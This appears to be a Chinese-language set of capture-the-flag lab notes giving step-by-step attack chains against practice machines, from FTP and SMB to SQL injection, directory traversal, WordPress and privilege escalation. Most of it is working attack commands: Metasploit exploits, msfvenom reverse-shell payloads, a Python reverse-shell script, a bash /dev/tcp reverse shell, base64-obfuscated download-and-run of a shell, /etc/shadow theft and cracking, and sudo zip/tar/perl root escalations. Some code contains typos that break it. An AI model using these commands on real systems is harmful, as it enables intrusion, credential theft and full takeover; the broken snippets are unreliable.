FTP

信息探测
nmap -sV 192.168.0.1 //扫描服务信息以及服务版本
image.png
nmap -T4 -A -v 192.168.0.1 //快速扫描主机全部信息

saechsploit ProFTPD 1.3.3c(FTP版本信息) // 查看是否有漏洞溢出

使用Metasploit进行溢出

msfconsole //打开Metasploit

search ProFTPD 1.3.3.3c //输入search对应的软件及版本

use exploit/unix/ftp/proftpd_133c_backdoor //使用exploit

show payload //查看可以使用的payload

set payload cmd/unix/reverse //设置payload

设置payload参数
show options
set rhost 192.168.0.1 //靶场IP

set lhost 192.168.0.3 //攻击机IP

run //执行

执行命令

id //查看当前用户权限

python -c “import pty;pty.spawn(‘bin/bash’)” //使用python pty开启终端

获取flag值
pwd //查看当前路径

ls -alh //输出全部文件

cd /root/

ls -alh //输出全部文件
cat flag

注意:对于开放FTP、SSH、Telnet等服务的系统,可以尝试一些对应服务版本的漏洞代码;
对于系统,一定要注意利用现成的EXP来root主机。

寻找Flag

信息收集:
nmap -p- -T4 192.168.0.1 //是用最快速度探测所开端口

nmap -T4 -A -v 192.168.0.1 //扫描所有服务和信息

深入挖掘:
对于开放http服务的靶场可以使用其他命令进行探测
nikto -host http://192.168.0.1:8080 //敏感文件探测

dirb http://192.168.0.1:8080 //扫描敏感目录

分析nmap nikto扫描结果

nc 192.168.0.1 8888
//对于大端口非http服务可以使用nc来探测该端口的banner信息

//对于大端口http服务,可以使用浏览器浏览查看源代码寻找flag值

nc反弹命令之后

id //查看当前用户权限

pwd //查看当前所在的文件路径

ls -alh //详细输出全部文件

更深入挖掘:
FTP匿名登录 挖掘铭感信息;

在浏览器输入 ftp://192.168.0.1 匿名登录ftp服务器根目录,查看敏感文件,注意一定要查看源代码;

在站点robots.txt文件中 寻找敏感文件,挖掘敏感文件漏洞;
对于命令执行中,为了绕过对于的限制,可以使用相近命令来替代限制的shell命令
如 cat /etc/passwd 使用 more /etc/passwd 来代替

SSH远程登录
ssh Summer@192.168.0.1

22端口不能远程登录 使用其他端口登录ssh
ssh -p 22222 Summer@192.168.0.1 //用22222端口登陆ssh

pwd
ls
cat more //执行命令查看flag值

总结:
注意未知服务端口,使用nc获取对应的banner信息
使用对应相近的shell命令来绕过限制如 cat more
对每个服务都要进行对应的探测,不放过任何一个可以利用的点

SQL注入

GET

信息探测
nmap -sV 192.168.0.1 //扫描端口和端口的服务

nmap -T4 -A -v 192.168.0.1 //快速扫描主机全部信息

nikto -host http://192.168.0.1 //扫描目录

dirb http://192.168.0.1 //扫描敏感目录

漏洞扫描OWASP-zap(Kali自带)

漏洞利用Sqlmap
sqlmap -u “url” —dbs //查看数据库名

sqlmap -u “url” -D “数据库名” —tables //查看对应数据库中的数据表

sqlmap -u “url” -D “数据库名” -T “表名” —columns //查看对应字段

sqlmap -u “url” -D “数据库名” -T “表名” -C “列名1,列名2” —dump //查看对应字段的值

sqlmap -u “url” —os-shell //直接获取shell

Msf制作WebShell
攻击机监听

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.1

show options //查看参数是否设置完成

run

生成反弹
shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.1 lport=4444 -f raw > /root/Desktop/shell.php


生成文件

gedit shell.php

POST

信息探测 Wordpress靶场

nmap -T4 -p- 192.168.0.1 //扫描主机开放端口

nmap -T4 -A -v 192.168.0.1 //扫描主机全部信息

nikto -host http://192.168.0.1:8080 //对于某些靶场可以使用nikto扫描器

dirb http://192.168.0.1 //扫描靶场开放目录和文件

漏洞扫描工具OWASP-ZAP

POST提交SQLmap注入:

1、先抓到POST提交包

2、gedit request.raw //创建request文件

3、粘贴POST提交包

sqlmap -r request.raw —level 5 —risk 3 —dbs —dbms mysql —batch //数据库名

sqlmap -r request.raw —level 5 —risk 3 -D “数据库名” —tables —dbms mysql —batch //数据库中的表

sqlmap -r request.raw —level 5 —risk 3 -D “数据库名” -T “表名” —columns —dbms mysql —batch //表中的字段

sqlmap -r request.raw —level 5 —risk 3 -D “数据库名” -T “表名” -C “字段1,字段2” —dump —dbms mysql —batch //字段中的值

Wordpress后台寻找上传点:
主题的 404.php 上传shell

WebShell 获取 /usr/share/webshells/php/

cd /usr/share/webshells/

ls

cd php/

ls

cp php-reverse-shell.php /root/Desktop/ //拷贝反弹shell

cd /root/Desktop/

gedit php-reverse-shell.php //修改反弹ip和端口并拷贝

修改Wordpress 404.php页面为反弹shell

nc -nlvp 4444 //nc监听4444端口
执行shell,获取反弹shell
http://ip:port/目录/wp-content/themes/主题名/404.php //Wordpress404路径

python -c “import pty;pty.spawn(‘/bin/bash’)” //启动终端

cat /etc/shadow

cat /etc/passwd

su - //提升root权限 需要当前用户密码,使用sqlmap跑出来的密码

盲注

信息探测

nmap -sV 192.168.0.1 //扫描主机服务和版本

nmsp -T4 -A -v 192.168.0.1 //快速扫描主机全部信息

nikto -host http://192.168.0.1 //探测敏感信息

AVWS漏洞扫描器
//扫描到SQL时间盲注

SQLmap盲注:(—batch自动Y)

sqlmap -u “url” —headers=”X-Forwarded-For:*” —dbs —batch //查看数据库名

sqlmap -u “url” —headers=”X-Forwarded-For:*” -D “数据库名” —tables —batch //查看数据库中的表

sqlmap -u “url” —headers=”X-Forwarded-For:*” -D “数据库名” -T “表名” —columns —batch //查看表中的字段

sqlmap -u “url” —headers=”X-Forwarded-For:*” -D “数据库名” -T “表名” -C “字段1,字段2” —dump —batch


—headers 参数由AVWS扫出来的注入点

—user-agent
—rederer
—cookie //cookie用于重定向

SSH私钥泄露

dirb http://192.168.1.1:8888 //kail文件扫描

nmap -sV 192.168.0.1 //探测靶场开放的服务与服务的版本

nmap -A -v 192.168.0.1 //探测靶场全部信息

nmap -O 192.168.0.1 //探测靶场的操作系统类型与版本

nikto -host 192.168.0.1 //对于某些靶场 可以使用nikto扫描器

cat /etc/passwd //查看所有用户列表

cat /etc/group //查看用户组

find / -user root //查看属于某些用户的文件

tmp //查看缓冲文件目录

tmp$ ls -al //查看隐藏文件

cat /etc/crontab //查看其他用户是否有定时任务,并查看对应的任务内容

文件扫描到SSH秘钥 解密
ssh2john id_rsa > rsacrack //转换可识别的john

zcat /usr/share/wordlists/rockyou.txt.gz | john —pipe —rules rsacrack //字典解密

Python反弹shell代码:

!/usr/bin/python

import socket,os,subprocess

s=socker.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“攻击机IP地址”,”攻击机监听端口”))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

p=subprocess.call([“/bin/sh”,”-i”])

nc -lpv 监听端口 //攻击机

id //查看当前用户权限(0号权限表示root权限)

su - root //提升权限(输入当前用户密码提升至root用户)

SSH暴力破解工具:hyara、medusa、metasploit(msf)

使用cupp创建字典:
git clone https://github.com/jeanphorn/common-password.git

ls common-password

chmod +x cupp.py

./cupp.py -i
//以交互的方式创建字典
或者使用:https://github.com/TheKingOfDuck/fuzzDicts 的字典

sessions -i l //爆破成功之后创建会话

python -c “import pty;pty.spawn(‘/bin/bash’)” //优化会话ssh

su - root //提升权限(输入当前用户密码提升至root用户)

总结:特别注意/tmp数据缓冲目录 以及/etc/crontab定时执行的文件(通过修改执行文件进行反弹shell)

SMB

SMB信息泄露(139 445端口)

nmap -A -v -T4 192.168.0.1 //查看靶场全部信息

针对SMB协议,使用空口令,弱口令尝试登陆并且查看敏感文件,下载查看:
smbclient -L 192.168.0.1

smbclient ‘\192.168.0.1\share$(文件名)

get flag.txt(文件名字) //下载敏感文件

searchsploit Samba smbd 4.3.11-Ubuntu(版本号) //针对SMB协议远程溢出漏洞进行分析

mysql -h 192.168.0.1 -u Admin -p //kali终端远程登录数据库

ssh Admin@192.168.0.1 //kali终端远程登录ssh

dirb http://192.168.0.1 //扫描靶场开放目录和文件

Msf制作WebShell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.1 lport=4444 -f raw > /root/Desktop/shell.php

攻击机监听
msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.1

set lport 4444

show options //查看参数是否设置完成
run

python -c “import pty;pty.spawn(‘/bin/bash’)” //优化会话ssh

cat /etc/passwd //查看其他用户名

su 用户名 //切换到该用户

sudo -l //查看当前用户能执行哪些root操作

su sudo //提升到root权限 需要当前用户密码

SSL注入

SSI主要是为了赋予html静态页面动态的效果,通过SSI来执行系统命令,并返回对应的结果
如果在网站目录中发现了.stm .shtm .shtml ,并且网站对于SSL的输入没有做到严格过滤,很有可能被SSI注入攻击

信息收集:
nmap -sV 192.168.0.1 //探测主机服务信息以及服务版本

nmap -T4 -A -v 192.168.0.1 //快速探测主机全部信息

nikto -host http://192.168.0.1 //探测敏感信息

dirb http://192.168.0.1 //遍历目录

深入挖掘:
分析nmap nikto扫描结果;使用浏览器打开敏感页面查看敏感信息,一定要查看源代码

漏洞利用:(根据提示来利用对应SSL注入漏洞)
//下载shell,给予权限,并执行

Msf制作WebShell(Python)
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.0.1 lport=4444 -f raw > /root/Desktop/shell.py

攻击机监听
msfconsole

use exploit/multi/handler

set payload python/meterpreter/reverse_tcp

set lhost 192.168.0.1

set lport 4444

show options //查看参数是否设置完成
run

mv shell.py /var/www/html/ //把shell.py移动到文件夹下

service apache2 start //打开Apache

service apache2 status //查看Apache是否打开
sysinfo //查看系统信息

shell //获取shell
shell
id //查看当前用户权限

python -c “import pty;pty.spawn(‘/bin/bash’)” //优化会话ssh

获取flag值(一般情况下,靶场机器的flag值是存放在服务器的根目录下,/root/目录)
cd /root/

ls

cat
flag

writeup 测试文档 总结文档

目录遍历

信息探测

nmap -sV 192.168.0.1 //扫描主机服务信息以及服务版本

nmap -T4 -A -v 192.168.0.1 //快速扫描主机全部信息

nikto -host http://192.168.0.1 //探测敏感信息

dirb http://192.168.0.1 //目录遍历

漏洞扫描:owasp-zap Web漏洞扫描器,自动挖掘web应用程序中的漏洞

owasp-zap //终端启动

分析扫描结果:
目录遍历漏洞

../../../../../../../../../etc/shadow

../../../../../../../../../etc/passwd

利用目录遍历漏洞获取shell思路:

— 上传webshell到服务器,之后通过对应的目录遍历路径访问webshell,执行webshell。在kali获取反弹shell

1、敏感页面上传shell

— dbadmin敏感目录有敏感页面,浏览器访问,使用弱口令登录;

登录页面之后 查找可以利用写webshell的点

使用/usr/share/webshell/php/下的shell(nc反弹)

cd /usr/share/webshell/php/

ls

cp php-reverse-shell.php /root/Desktop //拷贝到桌面

gedit php-reverse-shell.php //修改反弹IP地址和端口

mv php-reverse-shell.php shell.php //修改文件名字

2、在数据库中写入shell
新建库,新建表,字段

字段写入

3、创建web服务 用于靶场wget对应的shell
python -m “SimpleHTTPSever” //路径在哪里就是在哪里启动了一个HTTP服务

4、下载shell之前设置shell的监听 (nc)
nc -nlvp 端口号 //启动监听nc

5、目录遍历访问shell执行下载
../../../../../../../../../usr/databases/shell.php

6、监听端收到反弹shell
id //查看用户

python -c “import pty;pty.spawn(‘/bin/bash’)” //优化会话ssh

总结:利用目录遍历漏洞配合文件上传webshell,反弹对应shell。

也可以来获取敏感信息 例如破解Linux用户名和密码
/etc/passwd /etc/shadow

将passwd和shadow重新定义为可识别的文件
unshadow passwd shadow > cracked

使用john破解对应的cracked文件 登录ssh
john cracked

目录遍历之提权

提权前提:

1、已经拿到低权限shell

2、被入侵机器有nc、python、perl等常见工具

3、有权限上传和下载



一、内核漏洞提权:(优先)

(1)
cat /etc/lssue //查看发行版本 不返回则无内容

cat /etc/*-release //查看发行版本 DISTRIB_DESCRIPTION=发行版本号

uname -a //查看内核版本

(2)

searchspoit 发行版本 内核版本 //寻找内核溢出代码

searchspoit Ubuntu 12.04.5 //没有则不能内核溢出

(3)如果有内核溢出漏洞则 :上传内核溢出代码
编译执行
gcc xxx.c -o exploit //编译内核溢出代码为可执行文件

chmod +x exploit //给予可执行文件权限

./exploit //执行

二、明文root密码提权

注:大多Linux系统密码都和/etc/passwd和/etc/shadow俩个配置文件息息相关,passwd里面储存了用户,shadow里面是密码的hash 出于安全考虑passwd是全用户可读,root可写。shadow仅root可读写

(1)破解Linux用户和对应密码
cat /etc/passwd/

cat /etc/shadow/

unshadow passwd shadow > cracked //转换为可识别的密码文件

john cracked

三、计划任务

默认这些程序以root权限执行,如果有幸遇到把其中脚本配置成任意用户可写的管理员,可以修改脚本等回连rootshell;如果定时执行的是py脚本,可以把脚本替换为py的反弹shell

cat /etc/crontab //查看是否有可写的计划任务
(1)Python反弹shell代码:

!/usr/bin/python

import socket,os,subprocess

s=socker.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect((“攻击机IP地址”,”攻击机监听端口”))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

p=subprocess.call([“/bin/sh”,”-i”])

nc -lpv 监听端口 //攻击机使用nc接收

四、密码复用

寻找配置文件,挖掘对应密码,有了疑似的root密码一定是ssh登录,然而ssh很可能禁用root登录,或者防火墙限制,回过头来,我们有一个低权shell,想办法在上面输入root密码就好了,但是在低权shell直接用sudo是没用的,因为出于安全考虑,必须用终端设备中输入密码,我们必须模拟一个终端设备,python就有这样的功能

(1)在shell中输入
python -c “import pty;pty.spawn(‘/bin/sh’)” //模拟真正键盘输入

python -c “import pty;pty.spawn(‘/bin/bash’)” //同上

sudo -l
password //需要输入当前用户密码,尝试弱口令

ls -alh //查看敏感文件

cd /home
ls //查看该机器有哪些目录

cd zico
ls -alh //查看zice目录敏感文件

cd wordpress
cat wp-config.php //查看配置文件是否有对应密码,拿去密码复用

(2)配置文件中寻找到数据库zico用户和密码,尝试ssh连接

nmap -sV 192.168.0.1 //查看是否开放ssh服务

ssh zico@192.168.0.1 //用户名@主机名
password //输入zico用户密码

(3)成功登录
sudo -l //查看当前用户可以使用root提权的命令信息

//提示可以使用/bin/tar和/usr/bin/zip ,并且不需要root密码

四、ZIP提权

touch exploit //新建文件

sudo -u root zip exploit.zip exploit -T —unzip-command=”sh -c /bin/bash”

执行该命令则提升至root权限

五、tar提权

sudo -u root tar cf /dev/null exploit —checkpoint=1 —checkpoint-action=”/bin/bash”

命令执行

漏洞介绍:

当应用需要调用一些外部程序处理内容的情况下,就会用到执行系统命令的函数。
如PHP中的system、exec、shell_exec等

信息探测:
使用sparta工具对信息进行探测
sparta //终端输入打开

破解哈希值

(1)创建一个txt将哈希值输入进去

(2)打开 https://crackstation.net 将哈希值粘贴进去
通过破解的密码和对应的邮箱用户名登录后台

漏洞利用:AVWS
并未扫出漏洞就没有漏洞了吗

登录成功后
再点击webshell按钮
利用登录之后的cookie成功进入Webshell

反弹shell:
nc nlvp 4444 //攻击机启动监听netcat

echo ‘bash -i >& /dev/tcp/攻击机ip/4444 0>&1’ | bash //靶场机器反弹shell

python -c “import pty;pty.spawn(‘/bin/bash’)” //优化会话ssh

cd .. //返回上一层目录

cd .. //返回上一层目录

cd bulldogadmin //在home文件夹发现其他用户目录

ls //并没看到文件

ls -alh //使用这个命令可以查看隐藏的文件

cd .hiddenadmindirectory //切换到隐藏文件

string customPermissionApp //查看文件中的字符串内容

sudo su //查看到敏感字符疑似密码
使用sudo su输入密码
输入密码 //提升到root权限

中间件PUT上传漏洞

漏洞讲解:

中间件包括apache、tamcat、IIS、weblogic等,这些中间件可以设置支持的HTTP方法。(HTTP方法包括GET\POST、HEAD、DELETE、PUT、OPTION等)
PUT可以直接从客户机上传文件到服务器到指定的目录

信息探测:

nmap -p- -T4 192.168.0.1 //快速扫描主机开放的全部端口

nmap -T4 -A -v 192.168.0.1 //快速扫描主机全部信息

nikto -host http://192.168.0.1 //探测敏感信息

dirb http://192.168.0.1 //探测敏感信息

深入挖掘:
分析nmap、nikto扫描结果,挖掘可利用信息

使用漏洞扫描器owasp-zap
owasp-zap //终端打开 选择第三个

在扫描器中并没有扫描到任何漏洞

测试PUT漏洞
curl -v -X OPTIONS http://192.168.0.1/目录 //对敏感目录进行测试

Allow 为请求方法,里面有PUT请求方法

利用PUT漏洞获取shell思路:

上传webshell到服务器,之后通过对应的目录遍历路径访问Webshell获取反弹shell

上传webshell(浏览器插件Poster)

—在test目录下直接使用浏览器插件Poster,上传webshell

使用/usr/share/webshell/php/下的webshell

cp /usr/share/webshell/php/ // Tab俩下查看可以使用的shell

cp /usr/share/webshell/php/php-reverse-shell.php shell.php //将shell拷贝至桌面

gedit shell.php //编辑shell反弹的ip和端口

接受反弹shell

nc -nlvp 443 //绕过防火墙使用443端口

echo “import pty;pty.spawn(‘bin/bash’)” > /tmp/asdf.py //创建一个py

python /tmp/asdf.py //python执行该py文件


也可以
python -c “import pty;pty.spawn(‘/bin/bash’)” //优化会话ssh

id //查看当前用户权限

命令注入

信息收集:

nmap -sV 192.168.0.1 //扫描服务和服务版本

nmap -T4 -A -v 192.168.0.1 //快速扫描全部信息(-T4最快速度扫描)

nikto -host http://92.168.0.1 //探测敏感目录

dirb http://192.168.0.1 //探测敏感目录

查看robots.txt文件里的敏感目录

寻找到mp3文件
file backup.mp3 //查看文件具体文件类型

cat backup.mp3 //对于文本类型可以直接cat查看

查看到一个url尝试使用收集到的用户名和密码进行登录,成功登录到系统后台

可利用的信息

— robots.txt

— nothing

— secure

— backuo.zip

对于每一个可以看到的信息都要查看,比如某个文件、某个目录;
脑洞一定要大

进入系统渗透思路:

(1)登录-利用exploit-db

利用挖掘到的用户名和密码登录系统,然后对系统是否使用某种CMS、SMS等进行查看。

利用现成的EXP进行渗透

渗透测试技巧

searchsploit playSMS //查找是否有exp漏洞

searchsploit PlaySMS 1.4

cat usr/share/exploitdb/platforms/php/webapps/42003.txt //查看exp

查看POC,发现需要修改文件名

https://www.exploit-db.com/exploits/42003/

touch 1.csv //新建文件

BurpSuite抓包修改文件名为PHP语句

准备Shell
msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.0.1 lport=4444 -f elf > /var/www/html/shell

攻击机监听
msfconsole

use exploit/multi/handler

set payload linux/x86/meterpreter_reverse_tcp

set lhost 192.168.0.1

set lport 4444

show options //查看参数是否设置完成
exploit

service apache2 start //启动apache

绕过防火墙上传shell
利用base64绕过防火墙检测
echo ‘wget http://192.168.0.1/shell -O /tmp/shell’ | base64 //tmp目录任何用户都有权限并且把这条命令base64加密

echo ‘chmod 777 /tmp/shell’ | base64 //命令base64加密

echo ‘/tmp/shell’ | base64 //命令base64加密

BurpSuite修改文件名:
base64_decode(‘为base64加密的密文’) //base64_decode()函数解密

完成反弹shell,提升权限、获取flag
shell
sudo -l //查看www-data用户的sudo权限

sudo perl -e “exec ‘/bin/sh’ “

bash -i

flag常在根目录下
cd /root/

cat flag.txt

总结:信息收集一定要充分,根据题目提示来逐步进行渗透测试
对于web系统,一定要注意利用现成的exp进行渗透

安全暴力破解

信息探测
nmap -sV 192.168.0.1 //探测主机服务和服务版本

nmap -T4 -A -v 192.168.0.1 //快速扫描主机全部信息

nikto -host http://192.168.0.1 //探测敏感信息

拟定wordpress博客登录用户名
wpscan —url www.vtcsec.com/secret/ —enumerate u

Y //更新

暴力破解:
msfconsole //启动MSF

use auxiliary/scanner/http/wordpress_login_enum

set username admin
set pass_file /usr/share/wordlists/dirb/common.txt

set targeturi /secret/ //目标的目录

set rhosts 192.168.1.13

run

上传Webshell获取控制权

— twentyteeth 的 404.php可以上传webshell

Msf制作WebShell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.1 lport=4444 -f raw > /root/Desktop/shell.php

攻击机监听
msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.1

set lport 4444

show options //查看参数是否设置完成

run

访问shell,获取反弹shell
http://ip/secret/wp-content/themes/主题名/404.php

sysinfo //查看系统信息

id //查看用户权限

利用返回shell提升root权限

下载
download /etc/passwd

download /etc/shadow

将文件转换为可以识别的文件格式
unshadow passwd shadow > cracked

使用john破解密码
john cracked

在反弹shell中输入
shell
python -c “import pty;pty.spawn(‘/bin/bash’)” //优化终端

su - 破解用户名 //切换用户

破解密码 //输入密码登录

sudo -l //切换到root用户

破解密码 //输入密码切换

sudo bash //启动权限
成功获取root权限

cd /root/ //查找flag

ls

cat
flag.txt

综合检测

信息探测:
nmap -sV 192.168.0.1 //扫描开放服务和服务版本
nmap -T4 -A -v 192.168.0.1 //快速扫描主机全部信息

nikto -host http://92.168.0.1 //探测敏感目录

dirb http://192.168.0.1 //探测敏感目录

config //存在数据库的用户和密码

icons //中间件目录

利用弱点:

— 登录界面是否存在SQL注入

— 敏感信息是否泄露

— 已知漏洞
— backup.zip文件等等

查看登录页面源代码

利用burp进行fuzz测试,绕过登录

web模糊测试字典位置
cd /usr/share/wordlists/wfuzz

ls

cd Injections //使用SQL.txt

cp SQL.txt /root/Desktop/SQL.txt //复制到桌面

总结

查看burp中的Introder模块中返回值的不同,区分不同响应

查看源代码中的js

上传webshell获取控制权

利用burpsuite绕过上传过滤机制

Msf制作WebShell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.1 lport=4444 -f raw > /root/Desktop/shell.php

攻击机监听
msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.1

set lport 4444

show options //查看参数是否设置完成
run

shell

id

sudo -l //并没有sudo权限

ls

cd ..

cat config.php //寻找到数据库用户米和密码

mysql -u root -p //终端连接mysql数据库

python -c “import pty;pty.spawn(‘/bin/bash’)” //优化会话ssh

show databases //查看数据库

use deneme //选择数据库

show tables //表的列

select * from user //查询字段

su - root //输入数据库查询到的密码登录root用户

总结:熟练掌控各种安全工具的使用,以及常见的漏洞利用方式,逐步深入的探测目标